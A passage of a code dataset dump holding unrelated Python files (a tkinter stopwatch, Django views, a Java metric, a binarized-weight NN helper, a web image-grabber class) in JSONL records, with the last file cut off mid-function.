turn]:] = sequences[example, turn, :length[example, turn]]\n\t\treturn rightAlign\n\n# dialog_loc = '../chat_processed_data.h5'\n# param_loc = '../chat_processed_params.json'\n# image_loc = '../data_img.h5'\n\n# a = DataLoader(dialog_loc, image_loc, param_loc)\n# a.getTrainBatch(np.random.randint(100, size=30))\n","sub_path":"QBot/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"506361687","text":"from tkinter import *\nfrom time import sleep\nimport pickle,os\nglobal sec\nsec = 0\nfile2 = open('sec.dat','wb')\npickle.dump(sec,file2)\nfile2.close()\nglobal end\nend = False\nwindow = Tk()\nwindow.configure(bg = 'green')\nc = Canvas(window,width= 200,height = 200, bg = 'green')\nc.pack()\ndata= True\nfile = open('pickle.dat', 'wb')\npickle.dump(data,file)\nfile.close()\npause = False\nfile = open('pause.dat', 'wb')\npickle.dump(pause,file)\nfile.close()\nsec = 0\n\nwindow2 = Tk()\nwindow2.title('Entry')\nwindow2.configure(bg = 'yellow')\nframe = Frame(window2)\nentry = Entry(frame)\ndef entryadd():\n window.title(entry.get())\nbtn2 = Button(window2, text = 'Enter',command = entryadd, bg = 'lightblue')\nbtn2.pack(side = RIGHT,padx = 5)\nframe.pack(padx = 20, pady = 20)\nentry.pack(side = LEFT)\n\ndef pause():\n btnpause.configure(state=DISABLED)\n btnunpause.configure(state=NORMAL)\n pause = True\n file3=open('pause.dat','wb')\n pickle.dump(pause,file3)\n file3.close()\ndef stop():\n data = False\n file = open('pickle.dat', 'wb')\n pickle.dump(data,file)\n file.close()\ndef unpause():\n btnpause.configure(state=NORMAL)\n btnunpause.configure(state=DISABLED)\n pause = False\n file3=open('pause.dat','wb')\n pickle.dump(pause,file3)\n file3.close()\n poo = 1\n start(poo)\ndef start(event):\n btn.configure(state = NORMAL)\n btnpause.configure(state = NORMAL) \n WIDTH = 200\n HEIGHT = 200\n file2 = open('sec.dat','rb')\n sec = pickle.load(file2)\n file2.close()\n sec = int(sec)\n while True:\n sleep(1)\n sec += 1\n min1 = sec * 60\n print (min1)\n time_text = c.create_rectangle(WIDTH,HEIGHT,-WIDTH,-HEIGHT,fill = 'green')\n time_text = c.create_text(WIDTH/2,HEIGHT/2,text = str(sec),fill = 'white',font = ('Droid Serif',16))\n window.update()\n file = open('pickle.dat','rb')\n data = pickle.load(file)\n file.close()\n file3=open('pause.dat','rb')\n pause = pickle.load(file3)\n file3.close\n if pause == True:\n file2 = open('sec.dat','wb')\n pickle.dump(sec,file2)\n file2.close()\n break\n elif data == False:\n file2 = open('sec.dat','wb')\n pickle.dump(sec,file2)\n file2.close()\n break\n else:\n continue\nc.bind_all('', start)\nbtn = Button(window, text = 'stop', command = stop, bg = 'lightblue')\nbtnpause = Button(window,text = 'pause',command = pause,bg = 'lightblue')\nbtnunpause = Button(window,text = 'unpause',command = unpause, bg = 'lightblue')\nbtnpause.pack()\nbtn.pack()\nbtnunpause.pack()\nbtnunpause.configure(state = DISABLED)\nbtn.configure(state = DISABLED)\nbtnpause.configure(state = DISABLED)\n","sub_path":"The-finished-stopwatch.py","file_name":"The-finished-stopwatch.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"356414967","text":"# -*-coding: utf-8 -*-\ndef stu_register(name, age, course='PY' ,country='CN'):\n stu_info = \"\"\"--------注册学生信息--------\n name: %s \n age: %s \n country: %s \n course: %s \n----------------------------\n\"\"\" % (name, age, country, course)\n print(stu_info)\n if age > 50:\n return False\n else:\n return True\n\nregistriation_status = stu_register(\"henry\",60,course=\"Python\",country='USA')\n\nif registriation_status:\n print(\"注册成功\")\nelse:\n print(\"too old to be a student.\")","sub_path":"samples/函数返回值.py","file_name":"函数返回值.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618758671","text":"from django.contrib import messages\nfrom django.urls import reverse\nfrom django.utils.encoding import force_text\nfrom django.utils.html import format_html\nfrom django.utils.http import urlquote\nfrom django.utils.translation import ugettext_lazy as _\nfrom material.frontend.views.create import CreateModelView as MaterialCreateModelView\n\n\nclass CreateModelView(MaterialCreateModelView):\n label = None\n name = None\n\n def __init__(self, *args, **kwargs):\n self.label = kwargs.get(\"label\")\n self.name = kwargs.get(\"name\")\n self.extra_context = kwargs.get(\"extra_context\")\n\n super().__init__(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n kwargs = {\n \"list_url\": f\"{self.label}:{self.name}_list\",\n \"detail_url\": f\"{self.label}:{self.name}_detail\",\n }\n\n kwargs.setdefault(\"view\", self)\n\n if \"form\" not in kwargs:\n kwargs[\"form\"] = self.get_form()\n\n if self.extra_context is not None:\n if callable(self.extra_context):\n kwargs.update(self.extra_context(self.request))\n else:\n kwargs.update(self.extra_context)\n\n return kwargs\n\n def get_success_url(self):\n if self.success_url is None:\n args = []\n\n extra_context = None\n\n if callable(self.extra_context):\n extra_context = self.extra_context(self.request)\n else:\n extra_context = self.extra_context\n\n if extra_context is not None:\n item_args = extra_context.get(\"item_args\", [])\n args += item_args\n\n args += [self.object.pk]\n\n return reverse(f\"{self.label}:{self.name}_detail\", args=args)\n\n return self.success_url\n\n def get_template_names(self):\n if self.template_name is None:\n return [\n f\"{self.label}/{self.name}{self.template_name_suffix}.html\",\n f\"{self.label}/{self.name}_form.html\",\n \"material/frontend/views/form.html\",\n ]\n\n return [self.template_name]\n\n def report(self, message, level=messages.INFO, fail_silently=True, **kwargs):\n args = []\n\n extra_context = None\n\n if callable(self.extra_context):\n extra_context = self.extra_context(self.request)\n else:\n extra_context = self.extra_context\n\n if extra_context is not None:\n item_args = extra_context.get(\"item_args\", [])\n args += item_args\n\n args += [self.object.pk]\n\n url = reverse(f\"{self.label}:{self.name}_detail\", args=args)\n\n link = format_html('{}', urlquote(url), force_text(self.object))\n\n name = force_text(self.model._meta.verbose_name)\n\n options = {\"link\": link, \"name\": name}\n options.update(kwargs)\n\n message = format_html(_(message).format(**options))\n messages.add_message(self.request, level, message, fail_silently=True)\n","sub_path":"hcap_utils/contrib/material/views/create_model_view.py","file_name":"create_model_view.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"598259297","text":"from aibolit.utils.ast_builder import build_ast\nfrom aibolit.ast_framework import AST, ASTNodeType\nfrom itertools import islice\nfrom aibolit.ast_framework.java_package import JavaPackage\n\n\nclass FanOut:\n '''\n Fan Out metric is defined as the number of other classes referenced by a class.\n '''\n def __init__(self):\n pass\n\n def value(self, filename: str) -> int: # noqa: C901\n\n # exception are used from https://checkstyle.sourceforge.io/config_metrics.html#ClassFanOutComplexity\n considered_classes = {'ArrayIndexOutOfBoundsException': 0, 'ArrayList': 0, 'Boolean': 0, 'Byte': 0,\n 'Character': 0, 'Class': 0, 'Deprecated': 0, 'Deque': 0, 'Double': 0,\n 'Exception': 0, 'Float': 0, 'FunctionalInterface': 0, 'HashMap': 0,\n 'HashSet': 0, 'IllegalArgumentException': 0, 'IllegalStateException': 0,\n 'IndexOutOfBoundsException': 0, 'Integer': 0, 'LinkedList': 0, 'List': 0,\n 'Long': 0, 'Map': 0, 'NullPointerException': 0, 'Object': 0, 'Override': 0,\n 'Queue': 0, 'RuntimeException': 0, 'SafeVarargs': 0, 'SecurityException': 0,\n 'Set': 0, 'Short': 0, 'SortedMap': 0, 'SortedSet': 0, 'String': 0, 'StringBuffer': 0,\n 'StringBuilder': 0, 'SuppressWarnings': 0, 'Throwable': 0, 'short': 0, 'void': 0,\n 'TreeMap': 0, 'TreeSet': 0, 'UnsupportedOperationException': 0, 'Void': 0,\n 'System.out': 0, 'boolean': 0, 'byte': 0, 'char': 0, 'double': 0, 'float': 0,\n 'int': 0, 'long': 0,\n }\n fan_outs = 0\n\n # check imported classes\n tree = AST.build_from_javalang(build_ast(filename))\n for each_import in (tree.children_with_type(tree.root, ASTNodeType.IMPORT)):\n name_node, = islice(tree.children_with_type(each_import, ASTNodeType.STRING), 1)\n new_class = tree.get_attr(name_node, 'string').split('.')[-1]\n if considered_classes.get(new_class) is None:\n fan_outs += 1\n considered_classes[new_class] = 0\n\n p = JavaPackage(filename)\n for class_name in p.java_classes:\n tree = p.java_classes[class_name]\n for var_node in tree.get_nodes(ASTNodeType.VARIABLE_DECLARATOR):\n var_child = list(tree.children_with_type(var_node, ASTNodeType.STRING))\n new_class_name = tree.get_attr(var_child[0], 'string')\n\n for class_creator_node in tree.children_with_type(var_node, ASTNodeType.CLASS_CREATOR):\n for go_to_name in tree.children_with_type(class_creator_node, ASTNodeType.REFERENCE_TYPE):\n classC_child = list(tree.children_with_type(go_to_name, ASTNodeType.STRING))\n used_class_name = tree.get_attr(classC_child[0], 'string')\n if considered_classes.get(used_class_name) is None:\n considered_classes[used_class_name] = 0\n fan_outs += 1\n if considered_classes.get(new_class_name) is None:\n considered_classes[new_class_name] = 0\n\n # check classes of invokated methods\n for i in tree.get_nodes(ASTNodeType.STATEMENT_EXPRESSION):\n for invoked_method_child in tree.children_with_type(i, ASTNodeType.METHOD_INVOCATION):\n name_of_invoked_class = tree.get_method_invocation_params(invoked_method_child)\n if considered_classes.get(name_of_invoked_class.object_name) is None:\n considered_classes[name_of_invoked_class.object_name] = 0\n fan_outs += 1\n\n return fan_outs\n","sub_path":"aibolit/metrics/fanout/FanOut.py","file_name":"FanOut.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"457024328","text":"# 이분탐색\n# 2021-05-08\n# 입국심사\n# https://programmers.co.kr/learn/courses/30/lessons/43238\n\nfrom icecream import ic\n\ndef solution(n, times):\n mx = max(times)*n\n mn = 1\n \n while mn <= mx:\n md = (mx+mn)//2\n result = 0\n for time in times:\n result += md//time\n if result >= n:\n res = md\n mx = md-1\n elif result < n:\n mn = md+1\n \n return res\n","sub_path":"problem solving/programmers/binary_search1.py","file_name":"binary_search1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"265842012","text":"from example.Building_a_Mutiple_Choice_Quiz_26.Question import Question\n\n\nclass Student:\n\n def __init__(self, name, major, gpa, is_on_probation):\n self.name = name\n self.major = major\n self.gpa = gpa\n self.is_on_probation = is_on_probation\n\n def do_quiz(self, quiz):\n\n score = 0\n if len(quiz) < 1: # 如果沒有題目,回傳0分\n return score\n\n for question in quiz:\n ans = input(question.prompt)\n if ans == question.answer:\n score += 1\n\n return score / len(quiz) * 100\n","sub_path":"example/ClassesAndObjects_27/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"397481667","text":"import sys\nd={}\ndef max_sum(i,j):\n if (i,j) in d:\n return d[(i,j)]\n if i==99:\n return a[i][j]\n d[(i,j)]=a[i][j]+max(max_sum(i+1,j),max_sum(i+1,j+1))\n return d[(i,j)]\na=[]\nfor i in range(100):\n b=list(map(int,sys.stdin.readline().split()))\n a.append(b)\nprint(max_sum(0,0))","sub_path":"triangleSumE67Py.py","file_name":"triangleSumE67Py.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"404784196","text":"from numpy.lib.utils import deprecate\nimport torch\nimport torch.nn as nn\nimport math\nimport numpy as np\n\nSCALINGS = ['he', 'mean', 'none']\n\n\nclass BinaryWeightMemory(object):\n r\"\"\"\n The goal of this class is to hold the original weights of the NN\n while we make use of their binarized version in a fault memory setting\n :param p: the proportion of bits that will not get randomly switched (p(x_ = x) = p)\n \"\"\"\n\n def __init__(self,\n model: nn.Module,\n p: float = 0,\n scaling: str = 'he',\n shortcutavoid: bool = False,\n skipfirst: bool = False):\n r\"\"\"\n Hold the pointer to the weights and the quantized representation associated\n From Courbariaux & al. 2015\n \"\"\"\n ###\n # Input checks\n ###\n assert scaling in SCALINGS\n assert p > 0 and p <= 1, \"P={} is not a probability (0= self.pis[i], torch.tensor(\n [1.]).to(quantized.device), torch.tensor([-1.]).to(quantized.device))\n self.mask_faulty[i] = mask_faulty\n quantized *= mask_faulty\n if self.pis[i] == 0:\n assert torch.equal(quantized, true_value.sign())\n else:\n self.observed_fault_rate[i] = 1- (torch.sum((mask_faulty + 1)/2)/torch.numel(mask_faulty)).item()\n\n if self.scaling == 'he':\n quantized *= math.sqrt(2./(np.prod(true_value.shape)))\n # quantized *= math.sqrt(\n # 2. / (true_value.shape[1] * true_value.shape[2] * true_value.shape[3]))\n elif self.scaling == 'mean':\n quantized *= torch.mean(torch.abs(true_value))\n\n self.actual_params[i].data.copy_(quantized)\n\n def restore(self):\n for i in range(self.params):\n self.actual_params[i].data.copy_(self.saved_params[i])\n\n def clip(self):\n \"\"\" From Courbariaux & al. 2015, 2.4 - Clip weights after update to -1;1 \n since it doesn't impact the sign() ops while preventing overly large weights\n \"\"\"\n for i in range(self.params):\n self.actual_params[i].data.copy_(torch.clamp(\n self.actual_params[i], min=-1, max=1).data)\n\n def __str__(self):\n \"\"\" Return a string representing the first param of the weight manager \"\"\"\n return \"Saved params \\n {} \\n Actual params \\n {}\".format(self.saved_params[0], self.actual_params[0])\n\n @deprecate\n def change_p(self, new_p: float):\n \"\"\" Allowed to change the global probability of bit switch\n _differentiate_ is now the method to change the dictionnary of probabilites per (bloc, layer) tuple\n \"\"\"\n assert new_p >= 0 and new_p <= 1, \"P={} is not a probability (0= 18.5 < 24.9):\n print(\"You are Normal Weight\")\nelif (BMI2 > 25.0 <= 29.9):\n print(\"You are Over Weight\")\nelif (BMI2 > 30.0):\n print(\"You are Obese\")\n\n","sub_path":"h3q1MD.py","file_name":"h3q1MD.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"374205967","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import Prediction\nfrom .serializers import PredictionSerializers\nimport joblib\nimport pandas as pd\nfrom .form import PredictForm\nfrom django.contrib import messages\nfrom django.db.models import Sum\n\n\n# Create your views here.\n\nclass PredictionView(viewsets.ModelViewSet):\n queryset = Prediction.objects.all()\n serializer_class = PredictionSerializers\n\n\ndef text_value(df):\n ohe_col = joblib.load(\"/Users/tasrifahmed/PyProjects/final_project//allcollumn.pkl\")\n print(ohe_col)\n cat_columns = ['category']\n df_processed = pd.get_dummies(df, columns=cat_columns)\n print(df_processed)\n # df_list = df_processed.columns.to_numpy()\n newdict = {}\n for i in ohe_col:\n if i in df_processed:\n newdict[i] = df_processed[i].values\n else:\n newdict[i] = 0\n newdf = pd.DataFrame(newdict)\n return newdf\n\n\n# @api_view([\"POST\"])\ndef predict_svm(unit):\n try:\n mdl = joblib.load(\"/Users/tasrifahmed/PyProjects/final_project/product_model.pkl\")\n y_pred = mdl.predict(unit)\n print(y_pred)\n newdf = pd.DataFrame(y_pred, columns=['class'])\n newdf = newdf.replace({1: 'Low', 2: 'Medium', 3: 'High'})\n return format(newdf.values)\n except ValueError as e:\n return Response(e.args[0], status.HTTP_400_BAD_REQUEST)\n\n\ndef view_prediction(request):\n if request.method == 'POST':\n form = PredictForm(request.POST)\n if form.is_valid():\n Category = form.cleaned_data['category']\n Product = form.cleaned_data['product']\n Gross_sale = form.cleaned_data['gross_sale']\n Qty = form.cleaned_data['qty']\n Month = form.cleaned_data['month']\n myDictionary = request.POST.dict()\n print(myDictionary)\n DataFM = pd.DataFrame(myDictionary, index=[0])\n answer = text_value(DataFM)\n final_answer = predict_svm(answer)\n messages.success(request, 'Prediction for the Next Month Inventory is : {}'.format(final_answer))\n form.save(commit=True)\n\n form = PredictForm()\n\n return render(request, 'form.html', {'form': form})\n\n\ndef sold_product(request, *args, **kwargs):\n sold_items = Prediction.objects.all()\n qty_only = list(Prediction.objects.aggregate(sum_qty=Sum('qty')).values())[0]\n total_sale = list(Prediction.objects.aggregate(Sum('gross_sale')).values())[0]\n contex = {\n 'object': sold_items,\n 'total_qty': qty_only,\n 'total_sale': total_sale\n\n }\n return render(request, 'sold.html', contex)\n","sub_path":"predictionAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623961049","text":"from django.urls import path,include\nfrom . import views\napp_name = 'store'\nurlpatterns = [\n path('',views.home,name='home'),\n path('store/',views.store,name='store'),\n path('category_items//',views.category_items,name='category_items'),\n path('start_order/',views.startOrder,name='start_order'),\n path('item_order//',views.item_order,name='item_order'),\n path('increase_quantity//',views.increase_quantity,name='increase_quantity'),\n path('decrease_quantity//',views.decrease_quantity,name='decrease_quantity'),\n path('comfirm_payment///',views.comfirm_payment,name='comfirm_payment'),\n]\n","sub_path":"Point of Sale/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"518116068","text":"import datetime, os, platform, re, random, time, urllib.request, urllib.parse, sys\n\nIMG_EXT_REGEX = r'\\.(JPG|JPEG|PNG|GIF)'\nIS_WINDOW = re.search(r'Windows?|CYGWIN', platform.system(), flags=re.I)\nREG_COMPILE_OBJ = type(re.compile(\"test\", re.I))\n\nclass ImageGrabberBase:\n\n\tMETHOD_GRAB_IMG = []\n\tMETHOD_NEXT_URL = []\n\tMETHOD_GRAB_IMG_PARAM = []\n\tMETHOD_NEXT_URL_PARAM = []\n\tHEADERS = {}\n\n\tdef __init__(self, url =\"\", directory=\"\", num_group=1, wait_time=10, deviate=3, overwrite=True, other_param=\"\"):\n\t\t# Validations\n\t\tif not type(num_group) is int and not type(num_group) is float:\n\t\t\traise Exception(\"The parameter 'Number of Groups' is not filled properly\")\n\t\telif not type(deviate) is int and not type(deviate) is float:\n\t\t\traise Exception(\"The parameter 'Deviate' is not filled properly\")\n\t\telif not type(wait_time) is int and not type(wait_time) is float:\n\t\t\traise Exception(\"The parameter 'Wait Time' is not filled properly\")\n\t\telif not type(directory) is str or len(directory.strip()) == 0:\n\t\t\traise Exception(\"The parameter 'Directory' is not filled properly\")\n\t\t\n\t\t# Set up\n\t\tself.set_url(url)\n\t\tself.num_group = num_group\n\t\tself.group_pos = 0\n\t\tself.wait_time = abs(wait_time)\n\t\tself.deviate = abs(deviate)\n\t\tself.directory = directory\n\t\tself.overwrite = overwrite\n\n\t\tself.image_url = \"\"\n\t\tself.page_content = \"\"\n\n\t\tself.settings_for_ui()\n\n\t\tif os.path.exists(self.directory):\n\t\t\tif not os.path.isdir(self.directory):\n\t\t\t\traise Exception(\"Specified directory is a file.\")\n\t\telse:\n\t\t\tos.makedirs(self.directory)\n\n\t\tif other_param:\n\t\t\ttry:\n\t\t\t\tself.handle_param_options(other_param)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tself.image_errors = []\n\t\tself.additional_message = \"\"\n\n\tdef set_url(self, url):\n\t\t'''\n\t\tAction performed before getting the image url.\n\t\tNormally loads the page content (string) to self.page_content.\n\t\t'''\n\n\t\tif not url.strip():\n\t\t\traise Exception(\"No url provided.\")\n\t\tif not re.search(r'https?://', url, flags=re.I):\n\t\t\turl = \"http://\" + url\n\t\tself.start_url = url\n\t\tself.url = url\n\t\tself.domain = \"{t.scheme}://{t.netloc}/\".format(t=urllib.parse.urlparse(url))\n\n\n\tdef process_grab(self):\n\t\t'''\n\t\tProcess the grabbing of images from self.url, until the following:\n\t\t\t1) There is no url to navigate to next for more images.\n\t\t\t2) The num of group (self.num_group) of images is obtained.\n\t\t\t3) An HTTPError has occurred.\n\t\t\t4) A stop signal is raised.\n\n\t\tThe process goes like this:\n\t\t\tself.pre_get_image_url()\n\t\t\twait\n\t\t\tself.get_image_url()\n\t\t\tself.post_get_image_url()\n\t\t\tself.pre_get_next_url()\n\t\t\tself.get_next_url()\n\t\t\tself.post_get_image_url()\n\t\t'''\n\n\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\tsys.exit()\n\n\t\theader = {}\n\t\tif self.HEADERS:\n\t\t\titerator = None\n\t\t\tif type(self.HEADERS) == list or type(self.HEADERS) == tuple:\n\t\t\t\titerator = self.HEADERS[:]\n\t\t\telif type(self.HEADERS) == dict:\n\t\t\t\titerator = self.HEADERS.items()\n\t\t\t\n\t\t\tif iterator:\n\t\t\t\tfor (key, val) in iterator:\n\t\t\t\t\tif type(val) == list or type(val) == tuple:\n\t\t\t\t\t\theader[key] = val[random.randrange(0, len(val), 1)]\n\t\t\t\t\telse:\n\t\t\t\t\t\theader[key] = val\n\t\tself.HEADERS = header\n\n\t\tself.start_time = datetime.datetime.now()\n\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.text_display[\"text\"] = \"Started.\"\n\t\tif self.num_group == -1:\n\t\t\tself.group_pos = -2\n\t\twhile self.group_pos < self.num_group and self.url:\n\t\t\t# Get Item\n\t\t\tif not self.progress_frame or not self.progress_frame.stop_flag.is_set():\n\t\t\t\ttry:\n\t\t\t\t\tself.pre_get_image_url()\n\n\t\t\t\t\tif self.wait_time:\n\t\t\t\t\t\tdeviate = random.randrange(self.deviate * -1000.0, self.deviate * 1000.0)\n\t\t\t\t\t\twait_time = self.deviate / 1000.0 + self.wait_time\n\t\t\t\t\t\twhile wait_time > 0:\n\t\t\t\t\t\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\t\t\t\t\t\tself.additional_message += \"Stop signal was sent.\\n\"\n\t\t\t\t\t\t\t\tsave_log(self.get_log_data(), self.directory)\n\t\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\t\twait_time -= 0.1\n\t\t\t\t\t\t\ttime.sleep(0.1)\n\n\t\t\t\t\tobtained = self.get_image_url()\n\t\t\t\t\tself.post_get_image_url()\n\t\t\t\texcept urllib.error.HTTPError as e:\n\t\t\t\t\tself.image_errors.append((self.url, None, e))\n\t\t\t\t\tsave_log(self.get_log_data(), self.directory)\n\t\t\t\t\tsys.exit()\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tself.image_errors.append((self.url, None, e))\n\n\t\t\t\t# Get next url\n\t\t\t\tself.pre_get_next_url()\n\t\t\t\tself.get_next_url()\n\t\t\t\tself.post_get_next_url()\n\n\t\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\t\tself.additional_message += \"Stop signal was sent.\\n\"\n\t\t\t\tself.url = \"\"\n\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.text_display[\"text\"] = \"Halted\" if self.progress_frame.stop_flag.is_set() else \"Finished\"\n\n\t\tsave_log(self.get_log_data(), self.directory)\n\t\tsys.exit()\n\n\tdef pre_get_image_url(self):\n\t\t'''\n\t\tAction performed before getting the image url.\n\t\tNormally loads the page content (string) to self.page_content.\n\t\t'''\n\n\t\tself.page_content = get_html(self.url, self.HEADERS)\n\n\tdef get_image_url(self):\n\t\t'''\n\t\tStores the image url to self.image_url.\n\t\tCan return true for successful operation, or false otherwise.\n\t\t'''\n\n\t\tself.image_url = None\n\t\turl = process_grab(self.METHOD_GRAB_IMG, self.METHOD_GRAB_IMG_PARAM, self.page_content)\n\t\tif url:\n\t\t\tself.image_url = build_url(self.domain, url)\n\t\t\treturn True\n\t\treturn False\n\n\tdef post_get_image_url(self):\n\t\t'''\n\t\tActivity performed after getting the image url.\n\t\tNormally saves the image to the specified self.directory.\n\t\t'''\n\n\t\tif self.progress_frame:\n\t\t\tif self.group_pos >= 0:\n\t\t\t\tself.progress_frame.text_display[\"text\"] = \"Saving image: %s (%d of %d)\" % (self.image_url, self.group_pos + 1, self.num_group)\n\t\t\telse:\n\t\t\t\tself.progress_frame.text_display[\"text\"] = \"Saving image: %s\" % self.image_url\n\t\tif self.image_url:\n\t\t\ttry:\n\t\t\t\tsave_image(self.image_url, self.directory, self.get_image_name(), self.overwrite)\n\t\t\texcept Exception as e:\n\t\t\t\tself.image_errors.append((self.url, self.image_url, e))\n\t\telse:\n\t\t\tself.image_errors.append((self.url, None, None))\n\n\tdef pre_get_next_url(self):\n\t\t'''\n\t\tActivity performed before getting the next url.\n\t\tCurrently unused.\n\t\t'''\n\n\t\tpass\n\n\tdef get_next_url(self):\n\t\t'''\n\t\tStores the url of the next page, or None if not found to self.url.\n\t\tCan return true for successful operation, or false otherwise.\n\t\t'''\n\n\t\turl = process_grab(self.METHOD_NEXT_URL, self.METHOD_NEXT_URL_PARAM, self.page_content)\n\t\tif url:\n\t\t\turl = build_url(self.domain, url)\n\t\tself.url = url\n\t\treturn True if url else False\n\n\tdef post_get_next_url(self):\n\t\t'''\n\t\tActivity performed after getting the next url.\n\t\tNormally increases the count.\n\t\t'''\n\t\t\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.bar.step()\n\t\tif self.num_group != -1:\n\t\t\tself.group_pos += 1\n\n\tdef get_image_name(self):\n\t\t'''\n\t\tReturns the name for the image for self.image_url.\n\t\t'''\n\n\t\tname = \"\"\n\t\tself.image_url = self.image_url.rstrip(\"/\")\n\t\tif \"/\" in self.image_url:\n\t\t\tname = self.image_url[self.image_url.rfind(\"/\") + 1:]\n\t\treturn name\n\n\tdef get_log_data(self):\n\t\t'''\n\t\tReturns a string that contains the log information regarding this run.\n\t\t'''\n\n\t\tmessage = \"Started on %s\\n\" % self.start_time.strftime('%Y-%m-%d %H:%M:%S')\n\n\t\tmessage += \"\\nStarting url: %s\\nDirectory saved: %s\\nNum of groups: %d\\nWait time: %d\\nDeviation: %d\\nOverwrite: %s\\n\" % (self.start_url, self.directory, self.num_group, self.wait_time, self.deviate, self.overwrite)\n\n\t\tif self.HEADERS:\n\t\t\tmessage += \"\\nThe header used for HTTP Request is:\"\n\t\t\tfor key in self.HEADERS.keys():\n\t\t\t\tmessage += \"\\nKey:'%s' \\tValue:'%s'\" % (key, self.HEADERS[key])\n\t\t\tmessage += \"\\n\"\n\n\t\tself.additional_message = self.additional_message.strip() if self.additional_message else None\n\t\tif self.additional_message:\n\t\t\tmessage += \"\\nAdditional Message:\\n%s\\n\" % self.additional_message\n\n\t\tif len(self.image_errors) > 0:\n\t\t\tmessage += \"\\nThe following errors have occured:\\n\"\n\t\t\tfor (page_url, image_url, exception) in self.image_errors:\n\t\t\t\tmessage += \"There was an error grabbing the image from: %s\\n\" % page_url\n\t\t\t\tif image_url:\n\t\t\t\t\tmessage += \"The image url was: %s\\n\" % image_url\n\t\t\t\tif exception:\n\t\t\t\t\tmessage += \"The exception that occured: %s\" % str(exception)\n\t\t\tmessage += \"\\n\"\n\n\t\tif self.group_pos != self.num_group:\n\t\t\tmessage += \"\\nCompleted %d out of %d groups.\\n\" % (self.group_pos, self.num_group)\n\n\t\tmessage += \"\\n%s at %s\\n\\n\" % (\"Halted\" if (self.progress_frame and self.progress_frame.stop_flag.is_set()) else \"Finished\", datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n\t\treturn message\n\n\tdef import_settings(self, settings):\n\t\t'''\n\t\tHandle the import of changing the settings for the base class.\n\t\tRaises an exception if the basic 4 settings are not included.\n\t\t:param settings: A dictionary that contains keywords of settings to change.\n\t\t'''\n\n\t\tif 'METHOD_GRAB_IMG' in settings and 'METHOD_NEXT_URL' in settings and 'METHOD_GRAB_IMG_PARAM' in settings and 'METHOD_NEXT_URL_PARAM' in settings:\n\t\t\tself.METHOD_GRAB_IMG = settings[\"METHOD_GRAB_IMG\"]\n\t\t\tself.METHOD_NEXT_URL = settings[\"METHOD_NEXT_URL\"]\n\t\t\tself.METHOD_GRAB_IMG_PARAM = settings[\"METHOD_GRAB_IMG_PARAM\"]\n\t\t\tself.METHOD_NEXT_URL_PARAM = settings[\"METHOD_NEXT_URL_PARAM\"]\n\t\t\tself.HEADERS = settings.get(\"HEADERS\", [])\n\t\t\treturn\n\t\traise Exception(\"The imported settings are not configured properly.\")\n\n\tdef settings_for_ui(self, progress_frame=None):\n\t\t'''\n\t\tHandles the connection for the interface between the class and the UI component.\n\t\t'''\n\n\t\tself.progress_frame = progress_frame\n\n\tdef handle_param_options(self, options):\n\t\t'''\n\t\tHandles the string argument sent to further edit the process.\n\t\t:param options: The specified string argument.\n\t\t'''\n\n\t\tpass\n\ndef get_html(url, headers):\n\t'''\n\tReturns the html content of the specified url.\n\t:param url: A string that contains the url to get content from.\n\t:param headers: A list/tuple of (key, value) for http request headers.\n\t'''\n\n\tresponse = None\n\trequest = None\n\ttry:\n\t\tif headers:\n\t\t\trequest = urllib.request.Request(url, None, headers)\n\t\telse:\n\t\t\trequest = urllib.request.Request(url)\n\t\tresponse = urllib.request.urlopen(request)\n\t\thtml = response.read(1024).decode('utf-8')\n\t\thtml_part = response.read(1024).decode('utf-8')\n\t\twhile html_part:\n\t\t\thtml += html_part\n\t\t\thtml_part = response.read(1024).decode('utf-8')\n\t\tresponse.close()\n\t\treturn html\n\texcept Exception as e:\n\t\tif response:\n\t\t\tresponse.close()\n\t\traise urllib.error.HTTPError(str(e))\n\ndef save_image(image_url, path, name, overwrite):\n\t'''\n\tSaves the image under path/name\n\t:param image_url: The url containing the image to save.\n\t:param path: The path/directory to where to save the image.\n\t:param name: The name of the image.\n\t'''\n\n\tf = None\n\tif not name:\n\t\tname = image_url[image_url.rfind(\"/\") + 1:] if (\"/\" in image_url) else image_url\n\tpath = os.path.join(path, name)\n\tif name and image_url and 